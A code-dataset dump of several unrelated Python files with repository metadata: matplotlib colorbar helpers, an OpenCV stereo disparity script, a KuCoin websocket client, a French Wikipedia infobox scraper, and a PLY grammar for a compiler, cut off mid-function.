35029256291 | from mpl_toolkits.axes_grid1 import make_axes_locatable
import matplotlib.pyplot as plt
import numpy as np
from collections.abc import Iterable
def colorbar(mappable, pad=0.1, side="right"):
'''
colorbar whose height (or width) in sync with the master axe
https://matplotlib.org/mpl_toolkits/axes_grid/users/overview.html#colorbar-whose-height-or-width-in-sync-with-the-master-axes
'''
ax = mappable.axes
fig = ax.figure
divider = make_axes_locatable(ax)
cax = divider.append_axes(side, size="5%", pad=pad)
return fig.colorbar(mappable, cax=cax)
def colorbar2(mappable, shift=0.05, width=0.05, ax=None, trim_left=0, trim_right=0, side="right"):
# creates a color bar that does not shrink the main plot or panel
# only works for horizontal bars so far
if ax is None:
ax = mappable.axes
# Get current figure dimensions
try:
fig = ax.figure
p = np.zeros([1,4])
p[0,:] = ax.get_position().get_points().flatten()
except:
fig = ax[0].figure
p = np.zeros([ax.size,4])
for k, a in enumerate(ax):
p[k,:] = a.get_position().get_points().flatten()
xmin = np.amin(p[:,0]) ; xmax = np.amax(p[:,2]) ; dx = xmax - xmin
ymin = np.amin(p[:,1]) ; ymax = np.amax(p[:,3]) ; dy = ymax - ymin
if side=="top":
cax = fig.add_axes([xmin + trim_left, ymax + shift * dy, dx - trim_left - trim_right, width * dx])
cax.xaxis.set_ticks_position('top')
return fig.colorbar(mappable, cax=cax, orientation="horizontal")
elif side=="right":
cax = fig.add_axes([xmax + shift*dx, ymin, width * dx, dy])
cax.xaxis.set_ticks_position('top')
return fig.colorbar(mappable, cax=cax, orientation="vertical")
def shift_axes(axes,dx,dy):
# only 1 axis, we make it iterable
if not isinstance(axes, Iterable):
axes = [axes]
for ax in axes:
pos = ax.get_position()
pos = [pos.x0 + dx, pos.y0 + dy, pos.width, pos.height]
ax.set_position(pos)
def L2R(L,Teff):
'''
L2R(Lstar/Lsun,Teff) renvoie Rstar/Rsun
'''
return np.sqrt(L * (5777./Teff)**4)
def R2L(R,Teff):
'''
R2L(Rstar/Rsun,Teff) renvoie Lstar/Lsun
'''
return R**2 * (Teff/5777.)**4
def pdf(filename):
if (filename[-4:] != ".pdf"):
filename += ".pdf"
print(filename)
plt.savefig(filename, bbox_inches='tight')
| harrisonv789/Astro_Scripts | modules/colorbar_utils.py | colorbar_utils.py | py | 2,405 | python | en | code | 3 | github-code | 36 | [
{
"api_name": "mpl_toolkits.axes_grid1.make_axes_locatable",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "numpy.zeros",
"line_number": 30,
"usage_type": "call"
},
{
"api_name": "numpy.zeros",
"line_number": 34,
"usage_type": "call"
},
{
"api_name": "n... |
41946416343 |
import numpy as np
import cv2
import glob
from matplotlib import pyplot as plt
import os
from mpl_toolkits.mplot3d import axes3d, Axes3D
base_folder = os.getcwd() +'/parameters/'
s = cv2.FileStorage(base_folder + 'left_camera_intrinsics.xml', cv2.FileStorage_READ)
mtx_left = s.getNode('mtx_left').mat()
distCoeffs_left = s.getNode('distCoeffs_left').mat()
s.release()
s = cv2.FileStorage(base_folder + 'right_camera_intrinsics.xml', cv2.FileStorage_READ)
mtx_right = s.getNode('mtx_right').mat()
distCoeffs_right = s.getNode('distCoeffs_right').mat()
s.release()
s = cv2.FileStorage(base_folder + 'stereo_rectification.xml', cv2.FileStorage_READ)
R1 = s.getNode('R1').mat()
R2 = s.getNode('R2').mat()
Q = s.getNode('Q').mat()
s.release()
s = cv2.FileStorage(base_folder + 'P1.xml', cv2.FileStorage_READ)
P1 = s.getNode('P1').mat()
s = cv2.FileStorage(base_folder + 'P2.xml', cv2.FileStorage_READ)
P2 = s.getNode('P2').mat()
s.release()
img_folder = os.getcwd() + '/'
img_folder = os.getcwd() + '/'
img_l = cv2.imread(img_folder + 'images/task_3_and_4/left_4.png')
img_r= cv2.imread(img_folder + 'images/task_3_and_4/right_4.png')
height,width = img_l.shape[:2]
mapx1, mapy1 = cv2.initUndistortRectifyMap(mtx_left, distCoeffs_left, R1, mtx_left, (width,height), 5)
rectified_img_left = cv2.remap(img_l,mapx1, mapy1, cv2.INTER_LINEAR)
mapx2, mapy2 = cv2.initUndistortRectifyMap(mtx_right, distCoeffs_right,R2, mtx_right, (width,height), 5)
rectified_img_right = cv2.remap(img_r,mapx2, mapy2, cv2.INTER_LINEAR)
output_path = os.getcwd() + '/output/task_4'
cv2.imshow('rectified_img_l',rectified_img_left)
cv2.imwrite(output_path + '/rectified_img_left.png', rectified_img_left)
cv2.imshow('rectified_img_r',rectified_img_right)
cv2.imwrite(output_path + '/rectified_img_right.png', rectified_img_right)
window_size = 3
# Best parameter
left_matcher = cv2.StereoSGBM_create( minDisparity=0, numDisparities=160,blockSize=5, P1=8 * 3 * window_size ** 2,P2=32 * 3 * window_size ** 2,disp12MaxDiff=1,uniquenessRatio=15,speckleWindowSize=0,speckleRange=2, preFilterCap=63,mode=cv2.STEREO_SGBM_MODE_SGBM_3WAY)
#left_matcher = cv2.StereoSGBM_create(numDisparities=16, blockSize=15)
right_matcher = cv2.ximgproc.createRightMatcher(left_matcher)
# FILTER Parameters
lmbda = 10000
sigma = 1.2
visual_multiplier = 0.5
wls_filter = cv2.ximgproc.createDisparityWLSFilter(matcher_left=left_matcher)
wls_filter.setLambda(lmbda)
wls_filter.setSigmaColor(sigma)
displ = left_matcher.compute(img_l, img_r)
dispr = right_matcher.compute(img_r, img_l)
displ = np.int16(displ)
dispr = np.int16(dispr)
filteredImg = wls_filter.filter(displ, img_l, None, dispr)
filteredImg = cv2.normalize(src=filteredImg, dst=filteredImg, beta=0, alpha=255, norm_type=cv2.NORM_MINMAX)
filteredImg = np.uint8(filteredImg)
cv2.imshow('Disparity Map', filteredImg)
cv2.imwrite(output_path+'/Disparity.png', filteredImg)
| YB-Joe/Perception_in_Robotics | project_2a/code/task_4/task_4.py | task_4.py | py | 2,903 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "os.getcwd",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "cv2.FileStorage",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "cv2.FileStorage_READ",
"line_number": 11,
"usage_type": "attribute"
},
{
"api_name": "cv2.FileStorage",
... |
24199168182 | import asyncio
import logging
import random
from enum import Enum
from uuid import uuid4
import websockets
from wired_exchange.kucoin import CandleStickResolution
from typing import Union
WS_OPEN_TIMEOUT = 10
WS_CONNECTION_TIMEOUT = 3
class WebSocketState(Enum):
STATE_WS_READY = 1
STATE_WS_CLOSING = 2
class WebSocketNotification(Enum):
CONNECTION_LOST = 1
class WebSocketMessageHandler:
def can_handle(self, message: str) -> bool:
pass
def handle(self, message: str) -> bool:
"""process received message and indicates if handler must be kept registered
one time handler are useful when waiting for acknowledgement"""
pass
def on_notification(self, notification: WebSocketNotification):
pass
class KucoinWebSocket:
def __init__(self, endpoint, token, encrypt: bool,
ping_interval: int, ping_timeout: int, connect_id: str = None):
self._encrypt = encrypt
self._ping_timeout = ping_timeout
self._ping_interval = ping_interval
self._endpoint = endpoint
self._token = token
self._id = connect_id if connect_id is not None else str(uuid4()).replace('-', '')
self._logger = logging.getLogger(type(self).__name__)
self._ws = None
self._connected = asyncio.Event()
self._handlers = [PongMessageHandler(self, self._ping_interval, self._ping_timeout),
self.WelcomeMessageHandler(self._connected), SinkMessageHandler()]
self._state: WebSocketState = WebSocketState.STATE_WS_READY
async def open_async(self):
uri = f"{self._endpoint}?token={self._token}&connectId={self._id}"
try:
if self._state != WebSocketState.STATE_WS_READY:
return
async for ws in websockets.connect(uri,
logger=self._logger,
ssl=self._encrypt,
open_timeout=WS_OPEN_TIMEOUT,
ping_interval=self._ping_interval,
ping_timeout=self._ping_timeout):
try:
if self._state == WebSocketState.STATE_WS_CLOSING:
break
self._ws = ws
self._disconnect()
await self._run_message_loop(ws)
except websockets.ConnectionClosed:
continue
finally:
for handler in self._handlers:
handler.on_notification(WebSocketNotification.CONNECTION_LOST)
self._disconnect()
self._ws = None
self._state = WebSocketState.STATE_WS_READY
async def _run_message_loop(self, ws: websockets):
async for message in ws:
try:
if self._state == WebSocketState.STATE_WS_CLOSING:
break
self._handle_message(message)
except:
self._logger.error(f'something goes wrong when processing message: {message}', exc_info=True)
def insert_handler(self, handler: WebSocketMessageHandler):
self._handlers.insert(0, handler)
self._logger.debug(f'{type(handler).__name__}: handler registered')
def _handle_message(self, message):
for handler in self._handlers:
if handler.can_handle(message):
self._logger.debug(f'handler found: {type(handler).__name__}')
handler.handle(message)
return
async def subscribe_klines_async(self, topics: list[tuple[str, str, CandleStickResolution]]):
try:
await self.wait_connection_async()
subscription_id = random.randint(100000000, 1000000000)
self.insert_handler(SubscriptionHandler(subscription_id))
await self._ws.send(self._new_klines_subscription_message(subscription_id, topics))
self._logger.debug('kline subscription completed')
except TimeoutError:
self._logger.error('kline subscription timeout', exc_info=True)
async def subscribe_tickers_async(self, tickers: Union[list[tuple[str, str]], None]):
try:
await self.wait_connection_async()
subscription_id = random.randint(100000000, 1000000000)
self.insert_handler(SubscriptionHandler(subscription_id))
await self._ws.send(self._new_tickers_subscription_message(subscription_id, tickers))
self._logger.debug('ticker subscription completed')
except TimeoutError:
self._logger.error('ticker subscription timeout', exc_info=True)
def _new_tickers_subscription_message(self, subscription_id: int,
tickers: Union[list[tuple[str, str]], None]):
if tickers is None:
return f"""
{{
"id": {subscription_id},
"type": "subscribe",
"topic": "/market/ticker:all",
"response": true
}}
"""
else:
return f"""
{{
"id": {subscription_id},
"type": "subscribe",
"topic": "/market/ticker:{','.join([f'{bc}-{qc}' for bc, qc in tickers])}",
"response": true
}}
"""
    def _new_klines_subscription_message(self, subscription_id: int,
                                         topics: list[tuple[str, str, CandleStickResolution]]):
        # Build the JSON subscribe payload for candlestick updates.
        # Each topic is (base_currency, quote_currency, resolution); the server-side
        # topic element format is BASE-QUOTE_resolution, comma separated.
        return f"""
        {{
            "id": {subscription_id},
            "type": "subscribe",
            "topic": "/market/candles:{','.join([f'{bc}-{qc}_{res.value}' for bc, qc, res in topics])}",
            "response": true
        }}
        """
    def _disconnect(self):
        # Mark the connection as down; subsequent wait_connection_async() calls
        # will block until the next welcome frame. Returns self for chaining.
        self._connected.clear()
        return self
def is_connected(self):
self._connected.is_set()
def wait_connection_async(self, timeout: int = WS_CONNECTION_TIMEOUT):
return asyncio.wait_for(self._connected.wait(), timeout)
    def close(self):
        # Request a graceful shutdown: the message loop checks this state and
        # exits when the next frame arrives.
        self._state = WebSocketState.STATE_WS_CLOSING
    async def send(self, message):
        # Block until the connection is acknowledged, then forward the raw payload.
        await self.wait_connection_async()
        await self._ws.send(message)
class WelcomeMessageHandler(WebSocketMessageHandler):
    """Sets the connection event when the server's one-time "welcome" frame arrives."""

    def __init__(self, event: asyncio.Event):
        self._logger = logging.getLogger(type(self).__name__)
        self._connected = event

    def can_handle(self, message):
        # Only relevant until the first welcome frame has been observed.
        if self._connected.is_set():
            return False
        return '"type":"welcome"' in message

    def handle(self, message):
        # Unblock every coroutine awaiting the connection.
        self._connected.set()
        self._logger.debug('connection acknowledged by server')
        return True
class PongMessageHandler(WebSocketMessageHandler):
    """Keeps the connection alive: periodically sends ping frames and consumes pongs.

    Server-provided interval/timeout are in milliseconds; pings are sent slightly
    early (95% of the interval) to stay inside the server's window.
    """

    def __init__(self, ws: KucoinWebSocket, ping_interval: int, ping_timeout: int):
        self._ws = ws
        self._ping_interval = ping_interval / 1000 * .95
        self._ping_timeout = ping_timeout / 1000
        # Initialize all state the loop reads *before* scheduling it, so the
        # task can never observe a partially constructed handler.
        self._pong = asyncio.Event()
        self._logger = logging.getLogger(type(self).__name__)
        self._task = asyncio.create_task(self._loop())
        self._task.set_name('ping_pong')

    async def _loop(self):
        """Ping/pong heartbeat: send ping, await pong, sleep, repeat."""
        while True:
            try:
                await self._send_ping_message()
                await asyncio.wait_for(self._pong.wait(), self._ping_timeout)
                self._pong.clear()
                await asyncio.sleep(self._ping_interval)
            # Bug fix: asyncio.wait_for raises asyncio.TimeoutError, which is only
            # an alias of the builtin TimeoutError from Python 3.11 on.
            except asyncio.TimeoutError:
                self._logger.warning('ping timeout reached without pong')
                continue
            except asyncio.CancelledError:
                self._logger.warning('ping handler stopped')
                break

    def can_handle(self, message):
        # Plain literal (the original used an f-string with no placeholders).
        return '"type":"pong"' in message

    def handle(self, message):
        self._pong.set()
        return True

    def on_notification(self, notification: WebSocketNotification):
        # Stop pinging once the underlying connection is gone.
        if notification == WebSocketNotification.CONNECTION_LOST:
            self._task.cancel()

    def _send_ping_message(self):
        """Return the coroutine that sends one ping frame with a random id."""
        message_id = random.randint(100000000, 1000000000)
        return self._ws.send(f'{{ "id":{message_id},"type":"ping" }}')
class SinkMessageHandler(WebSocketMessageHandler):
    """Catch-all terminal handler: accepts every message and logs it at debug level.

    Keep this handler last in the chain so it only sees unhandled messages.
    """

    def __init__(self):
        self._logger = logging.getLogger(type(self).__name__)

    def can_handle(self, message):
        return True

    def handle(self, message):
        # Lazy %-style argument: the message is only formatted when debug
        # logging is actually enabled (idiomatic for hot logging paths).
        self._logger.debug('unhandled message received: %s', message)
        return True
class SubscriptionHandler(WebSocketMessageHandler):
    """Watches for the server's response to one specific subscription request."""

    def __init__(self, subscription_id: int):
        self.subscription_id = subscription_id
        self._logger = logging.getLogger(type(self).__name__)

    def can_handle(self, message: str) -> bool:
        # Responses carry back the id we chose when subscribing.
        return f'"id":{self.subscription_id}' in message

    def handle(self, message: str) -> bool:
        # Always returns False so other handlers may still inspect the message.
        if '"type":"ack"' not in message:
            self._logger.warning(f'subscription #{self.subscription_id}: unexpected response: {message}')
        else:
            self._logger.info(f'subscription #{self.subscription_id} acknowledged')
        return False
class StrategyHandler(WebSocketMessageHandler):
    # Placeholder subclass: strategy-specific message handling is not implemented yet.
    pass
| WiredSharp/wiredExchange | wired_exchange/kucoin/WebSocket.py | WebSocket.py | py | 9,314 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "enum.Enum",
"line_number": 17,
"usage_type": "name"
},
{
"api_name": "enum.Enum",
"line_number": 22,
"usage_type": "name"
},
{
"api_name": "uuid.uuid4",
"line_number": 49,
"usage_type": "call"
},
{
"api_name": "logging.getLogger",
"line_number":... |
15119831760 | import requests
def get_page(name):
    """Query the French Wikipedia search API for *name*.

    Returns the decoded JSON response, or None if the request failed
    (the error is printed instead of raised).
    """
    endpoint = "https://fr.wikipedia.org/w/api.php?"
    search_params = {
        "action": "query",
        "list": "search",
        "srsearch": name,
        "format": "json",
    }
    try:
        response = requests.get(
            endpoint,
            params=search_params,
            headers={"Content-Type": "application/json"},
        )
        response.raise_for_status()
        return response.json()
    except requests.exceptions.RequestException as error:
        print(error)
def get_page_content(pageid):
    """Fetch the parsed (HTML) content of Wikipedia page *pageid*.

    Returns the decoded JSON response, or None if the request failed
    (the error is printed instead of raised).
    """
    endpoint = "https://fr.wikipedia.org/w/api.php?"
    parse_params = {
        "action": "parse",
        "pageid": pageid,
        "format": "json",
    }
    try:
        response = requests.get(
            endpoint,
            params=parse_params,
            headers={"Content-Type": "application/json"},
        )
        response.raise_for_status()
        return response.json()
    except requests.exceptions.RequestException as error:
        print(error)
from bs4 import BeautifulSoup
def get_information(name):
    """Scrape company details from the infobox of *name*'s French Wikipedia page.

    Returns a dict with any of the keys "address", "siren", "website" that were
    found, or None if any lookup/parsing step failed (the error is printed).
    """
    try:
        result = get_page(name)
        content = get_page_content(result['query']['search'][0]['pageid'])
        html = content['parse']['text']['*']
        dom = BeautifulSoup(html, "html.parser")
        information = {}
        # Idiom fix: iterate the header cells directly instead of indexing
        # via range(len(...)); traversal order is unchanged.
        for header in dom.find_all('th'):
            label = header.text
            if label == "Siège":
                information["address"] = header.find_next_sibling('td').text.replace('\n', '').strip()
            if label == "SIREN":
                information["siren"] = header.find_next_sibling('td').text.replace('\n', '').strip()
            if label == "Site web" or label == "Sites web":
                link = header.find_next_sibling('td').find('a')
                if link:
                    information["website"] = link.get('href')
        return information
    except Exception as error:
        # Broad boundary catch kept from the original: any failure is reported
        # and turned into a None result.
        print(error)
        return None
| PjuchNicz/Projet-ISKR | python/enrichment/wikipedia.py | wikipedia.py | py | 2,040 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "requests.get",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "requests.exceptions",
"line_number": 20,
"usage_type": "attribute"
},
{
"api_name": "requests.get",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "requests.exceptions... |
27764760485 | import ply.yacc as yacc
from anytree import Node
from lex import Lexer
class Parser():
    """LALR parser (ply.yacc) for the TPP language.

    Each ``p_*`` method's docstring IS a ply grammar production and is read by
    yacc at table-generation time — those docstrings are functional and must
    not be edited casually.  Every reduction builds an ``anytree.Node`` so a
    successful parse yields a full concrete syntax tree.  Terminal nodes carry
    ``line``/``column`` attributes (line numbers are normalized against the
    total line count supplied to :meth:`syntactic`).
    """

    # Token list produced by the lexical analysis step.
    tokens = Lexer.tokens

    def __init__(self, **kwargs):
        self.totalLines = 0      # total line count of the input; set by syntactic()
        self.result = True       # flips to False on the first syntax error
        self.lexer = Lexer()
        self.parser = yacc.yacc(module=self, **kwargs)

    def f_column(self, token, pos):
        """Return the 1-based column of the grammar symbol at *pos*."""
        data = token.lexer.lexdata  # renamed from `input` (shadowed a builtin)
        line_start = data.rfind('\n', 0, token.lexpos(pos)) + 1
        return (token.lexpos(pos) - line_start) + 1

    # ------------------------------------------------------------------
    # Top-level program structure
    # ------------------------------------------------------------------
    def p_programa(self, p):
        '''
        programa : lista_declaracoes
        '''
        p[0] = Node('programa', value = 'programa', children = [p[1]])

    def p_lista_declaracoes(self, p):
        '''
        lista_declaracoes : lista_declaracoes declaracao
                          | declaracao
        '''
        if(len(p) == 3):
            p[0] = Node('lista_declaracoes', value = 'lista_declaracoes', children = [p[1],p[2]])
        else:
            p[0] = Node('lista_declaracoes', value = 'lista_declaracoes', children = [p[1]])

    def p_declaracao(self, p):
        '''
        declaracao : declaracao_variaveis
                   | inicializacao_variaveis
                   | declaracao_funcao
        '''
        p[0] = Node('declaracao', value = 'declaracao', children = [p[1]])

    # ------------------------------------------------------------------
    # Variable declarations
    # ------------------------------------------------------------------
    def p_declaracao_variaveis(self, p):
        '''
        declaracao_variaveis : tipo DOIS_PONTOS lista_variaveis
        '''
        p[0] = Node('declaracao_variaveis', value = 'declaracao_variaveis', children = [
            p[1],
            Node(str(p[2]), value = str(p[2]), line = (p.lineno(2) - (self.totalLines - 1)), column = self.f_column(p, 2)),
            p[3]
        ])

    def p_inicializacao_variaveis(self, p):
        '''
        inicializacao_variaveis : atribuicao
        '''
        p[0] = Node('inicializacao_variaveis', value = 'inicializacao_variaveis', children = [p[1]])

    def p_lista_variaveis(self, p):
        '''
        lista_variaveis : lista_variaveis VIRGULA var
                        | var
        '''
        if(len(p) == 4):
            p[0] = Node('lista_variaveis', value = 'lista_variaveis', children = [
                p[1],
                Node(str(p[2]), value = str(p[2]), line = (p.lineno(2) - (self.totalLines - 1)), column = self.f_column(p, 2)),
                p[3]
            ])
        else:
            p[0] = Node('lista_variaveis', value = 'lista_variaveis', children = [p[1]])

    def p_var(self, p):
        '''
        var : ID
            | ID indice
        '''
        if(len(p) == 3):
            p[0] = Node('var', value = 'var', children = [
                Node(str(p[1]), value = str(p[1]), line = (p.lineno(1) - (self.totalLines - 1)), column = self.f_column(p, 1)),
                p[2]
            ])
        else:
            p[0] = Node('var', value = 'var', children = [
                Node(str(p[1]), value = str(p[1]), line = (p.lineno(1) - (self.totalLines - 1)), column = self.f_column(p, 1))
            ])

    def p_indice(self, p):
        '''
        indice : indice ABRE_COLCHETE expressao FECHA_COLCHETE
               | ABRE_COLCHETE expressao FECHA_COLCHETE
        '''
        if(len(p) == 5):
            p[0] = Node('indice', value = 'indice', children = [
                p[1],
                Node(str(p[2]), value = str(p[2]), line = (p.lineno(2) - (self.totalLines - 1)), column = self.f_column(p, 2)),
                p[3],
                Node(str(p[4]), value = str(p[4]), line = (p.lineno(4) - (self.totalLines - 1)), column = self.f_column(p, 4))
            ])
        else:
            p[0] = Node('indice', value = 'indice', children = [
                Node(str(p[1]), value = str(p[1]), line = (p.lineno(1) - (self.totalLines - 1)), column = self.f_column(p, 1)),
                p[2],
                Node(str(p[3]), value = str(p[3]), line = (p.lineno(3) - (self.totalLines - 1)), column = self.f_column(p, 3))
            ])

    def p_tipo(self, p):
        '''
        tipo : INTEIRO
             | FLUTUANTE
        '''
        p[0] = Node('tipo', value = 'tipo', children = [
            Node(str(p[1]), value = str(p[1]), line = (p.lineno(1) - (self.totalLines - 1)), column = self.f_column(p, 1))
        ])

    # ------------------------------------------------------------------
    # Function declarations
    # ------------------------------------------------------------------
    def p_declaracao_funcao(self, p):
        '''declaracao_funcao : tipo cabecalho
                           | cabecalho'''
        if(len(p) == 3):
            p[0] = Node('declaracao_funcao', value = 'declaracao_funcao', children = [
                p[1],
                p[2]
            ])
        else:
            p[0] = Node('declaracao_funcao', value = 'declaracao_funcao', children = [p[1]])

    def p_cabecalho(self, p):
        '''cabecalho : ID ABRE_PARENTESE lista_parametros FECHA_PARENTESE corpo FIM'''
        p[0] = Node('cabecalho', value = 'cabecalho', children = [
            Node(str(p[1]), value = str(p[1]), line = (p.lineno(1) - (self.totalLines - 1)), column = self.f_column(p, 1)),
            Node(str(p[2]), value = str(p[2]), line = (p.lineno(2) - (self.totalLines - 1)), column = self.f_column(p, 2)),
            p[3],
            Node(str(p[4]), value = str(p[4]), line = (p.lineno(4) - (self.totalLines - 1)), column = self.f_column(p, 4)),
            p[5]
        ])

    def p_lista_parametros(self, p):
        '''
        lista_parametros : lista_parametros VIRGULA parametro
                         | parametro
                         | vazio
        '''
        if(len(p) == 4):
            p[0] = Node('lista_parametros', value = 'lista_parametros', children = [
                p[1],
                Node(str(p[2]), value = str(p[2]), line = (p.lineno(2) - (self.totalLines - 1)), column = self.f_column(p, 2)),
                p[3]
            ])
        else:
            # `vazio` reduces to None: a parameterless list yields a leaf node.
            if(p[1] is not None):
                p[0] = Node('lista_parametros', value = 'lista_parametros', children = [p[1]])
            else:
                p[0] = Node('lista_parametros', value = 'lista_parametros')

    def p_parametro(self, p):
        '''
        parametro : tipo DOIS_PONTOS ID
                  | parametro ABRE_COLCHETE FECHA_COLCHETE
        '''
        p[0] = Node('parametro', value = 'parametro', children = [
            p[1],
            Node(str(p[2]), value = str(p[2]), line = (p.lineno(2) - (self.totalLines - 1)), column = self.f_column(p, 2)),
            Node(str(p[3]), value = str(p[3]), line = (p.lineno(3) - (self.totalLines - 1)), column = self.f_column(p, 3))
        ])

    def p_corpo(self, p):
        '''
        corpo : corpo acao
              | vazio
        '''
        if(len(p) == 3):
            p[0] = Node('corpo', value = 'corpo', children = [
                p[1],
                p[2]
            ])
        else:
            p[0] = Node('corpo', value = 'corpo')

    def p_acao(self, p):
        '''
        acao : expressao
             | declaracao_variaveis
             | se
             | repita
             | leia
             | escreva
             | retorna
        '''
        p[0] = Node('acao', value = 'acao', children = [p[1]])

    # ------------------------------------------------------------------
    # Statements
    # ------------------------------------------------------------------
    def p_se(self, p):
        '''
        se : SE expressao ENTAO corpo FIM
           | SE expressao ENTAO corpo SENAO corpo FIM
        '''
        if(len(p) == 6):
            p[0] = Node('condicional', value = 'condicional', children = [
                Node(str(p[1]), value = str(p[1]), line = (p.lineno(1) - (self.totalLines - 1)), column = self.f_column(p, 1)),
                p[2],
                Node(str(p[3]), value = str(p[3]), line = (p.lineno(3) - (self.totalLines - 1)), column = self.f_column(p, 3)),
                p[4],
                Node(str(p[5]), value = str(p[5]), line = (p.lineno(5) - (self.totalLines - 1)), column = self.f_column(p, 5))
            ])
        else:
            p[0] = Node('condicional', value = 'condicional', children = [
                Node(str(p[1]), value = str(p[1]), line = (p.lineno(1) - (self.totalLines - 1)), column = self.f_column(p, 1)),
                p[2],
                Node(str(p[3]), value = str(p[3]), line = (p.lineno(3) - (self.totalLines - 1)), column = self.f_column(p, 3)),
                p[4],
                Node(str(p[5]), value = str(p[5]), line = (p.lineno(5) - (self.totalLines - 1)), column = self.f_column(p, 5)),
                p[6],
                Node(str(p[7]), value = str(p[7]), line = (p.lineno(7) - (self.totalLines - 1)), column = self.f_column(p, 7))
            ])

    def p_repita(self, p):
        '''
        repita : REPITA corpo ATE expressao
        '''
        p[0] = Node('repita', value = 'repita', children = [
            Node(str(p[1]), value = str(p[1]), line = (p.lineno(1) - (self.totalLines - 1)), column = self.f_column(p, 1)),
            p[2],
            Node(str(p[3]), value = str(p[3]), line = (p.lineno(3) - (self.totalLines - 1)), column = self.f_column(p, 3)),
            p[4]
        ])

    def p_atribuicao(self, p):
        '''
        atribuicao : var ATRIBUICAO expressao
        '''
        p[0] = Node('atribuicao', value = 'atribuicao', children = [
            p[1],
            Node(str(p[2]), value = str(p[2]), line = (p.lineno(2) - (self.totalLines - 1)), column = self.f_column(p, 2)),
            p[3]
        ])

    def p_leia(self, p):
        '''
        leia : LEIA ABRE_PARENTESE var FECHA_PARENTESE
        '''
        # Bug fix: the LEIA token node previously stored value=str(p[2]) (the
        # '(' lexeme) instead of its own lexeme str(p[1]).
        p[0] = Node('leia', value = 'leia', children = [
            Node(str(p[1]), value = str(p[1]), line = (p.lineno(1) - (self.totalLines - 1)), column = self.f_column(p, 1)),
            Node(str(p[2]), value = str(p[2]), line = (p.lineno(2) - (self.totalLines - 1)), column = self.f_column(p, 2)),
            p[3],
            Node(str(p[4]), value = str(p[4]), line = (p.lineno(4) - (self.totalLines - 1)), column = self.f_column(p, 4))
        ])

    def p_escreva(self, p):
        '''
        escreva : ESCREVA ABRE_PARENTESE expressao FECHA_PARENTESE
        '''
        p[0] = Node('escreva', value = 'escreva', children = [
            Node(str(p[1]), value = str(p[1]), line = (p.lineno(1) - (self.totalLines - 1)), column = self.f_column(p, 1)),
            Node(str(p[2]), value = str(p[2]), line = (p.lineno(2) - (self.totalLines - 1)), column = self.f_column(p, 2)),
            p[3],
            Node(str(p[4]), value = str(p[4]), line = (p.lineno(4) - (self.totalLines - 1)), column = self.f_column(p, 4))
        ])

    def p_retorna(self, p):
        '''
        retorna : RETORNA ABRE_PARENTESE expressao FECHA_PARENTESE
        '''
        p[0] = Node('retorna', value = 'retorna', children = [
            Node(str(p[1]), value = str(p[1]), line = (p.lineno(1) - (self.totalLines - 1)), column = self.f_column(p, 1)),
            Node(str(p[2]), value = str(p[2]), line = (p.lineno(2) - (self.totalLines - 1)), column = self.f_column(p, 2)),
            p[3],
            Node(str(p[4]), value = str(p[4]), line = (p.lineno(4) - (self.totalLines - 1)), column = self.f_column(p, 4))
        ])

    # ------------------------------------------------------------------
    # Expressions (precedence encoded by the grammar levels below)
    # ------------------------------------------------------------------
    def p_expressao(self, p):
        '''
        expressao : expressao_logica
                  | atribuicao
        '''
        p[0] = Node('expressao', value = 'expressao', children = [p[1]])

    def p_expressao_logica(self, p):
        '''
        expressao_logica : expressao_simples
                         | expressao_logica operador_logico expressao_simples
        '''
        if(len(p) == 4):
            p[0] = Node('expressao_logica', value = 'expressao_logica', children = [
                p[1],
                p[2],
                p[3]
            ])
        else:
            p[0] = Node('expressao_logica', value = 'expressao_logica', children = [p[1]])

    def p_expressao_simples(self, p):
        '''
        expressao_simples : expressao_aditiva
                          | expressao_simples operador_relacional expressao_aditiva
        '''
        if(len(p) == 4):
            p[0] = Node('expressao_simples', value = 'expressao_simples', children = [
                p[1],
                p[2],
                p[3]
            ])
        else:
            p[0] = Node('expressao_simples', value = 'expressao_simples', children = [p[1]])

    def p_expressao_aditiva(self, p):
        '''
        expressao_aditiva : expressao_multiplicativa
                          | expressao_aditiva operador_soma expressao_multiplicativa
        '''
        if(len(p) == 4):
            p[0] = Node('expressao_aditiva', value = 'expressao_aditiva', children = [
                p[1],
                p[2],
                p[3]
            ])
        else:
            p[0] = Node('expressao_aditiva', value = 'expressao_aditiva', children = [p[1]])

    def p_expressao_multiplicativa(self, p):
        '''
        expressao_multiplicativa : expressao_unaria
                                 | expressao_multiplicativa operador_multiplicacao expressao_unaria
        '''
        if(len(p) == 4):
            p[0] = Node('expressao_multiplicativa', value = 'expressao_multiplicativa', children = [
                p[1],
                p[2],
                p[3]
            ])
        else:
            p[0] = Node('expressao_multiplicativa', value = 'expressao_multiplicativa', children = [p[1]])

    def p_expressao_unaria(self, p):
        '''
        expressao_unaria : fator
                         | operador_soma fator
                         | operador_negacao fator
        '''
        # NOTE(review): node name 'expressao_unaria' vs value 'expressao_unitaria'
        # is inconsistent in the original; kept as-is in case downstream passes
        # match on either spelling — confirm before unifying.
        if(len(p) == 3):
            p[0] = Node('expressao_unaria', value = 'expressao_unitaria', children = [
                p[1],
                p[2]
            ])
        else:
            p[0] = Node('expressao_unaria', value = 'expressao_unitaria', children = [p[1]])

    # ------------------------------------------------------------------
    # Operators
    # ------------------------------------------------------------------
    def p_operador_relacional(self, p):
        '''
        operador_relacional : MENOR
                            | MAIOR
                            | IGUAL
                            | DIFERENTE
                            | MENOR_IGUAL
                            | MAIOR_IGUAL
        '''
        p[0] = Node('operador_relacional', value = 'operador_relacional', children = [
            Node(str(p[1]), value = str(p[1]), line = (p.lineno(1) - (self.totalLines - 1)), column = self.f_column(p, 1))
        ])

    def p_operador_soma(self, p):
        '''
        operador_soma : MAIS
                      | MENOS
        '''
        p[0] = Node('operador_soma', value = 'operador_soma', children = [
            Node(str(p[1]), value = str(p[1]), line = (p.lineno(1) - (self.totalLines - 1)), column = self.f_column(p, 1))
        ])

    def p_operador_logico(self, p):
        '''
        operador_logico : E_LOGICO
                        | OU_LOGICO
        '''
        p[0] = Node('operador_logico', value = 'operador_logico', children = [
            Node(str(p[1]), value = str(p[1]), line = (p.lineno(1) - (self.totalLines - 1)), column = self.f_column(p, 1))
        ])

    def p_operador_negacao(self, p):
        '''
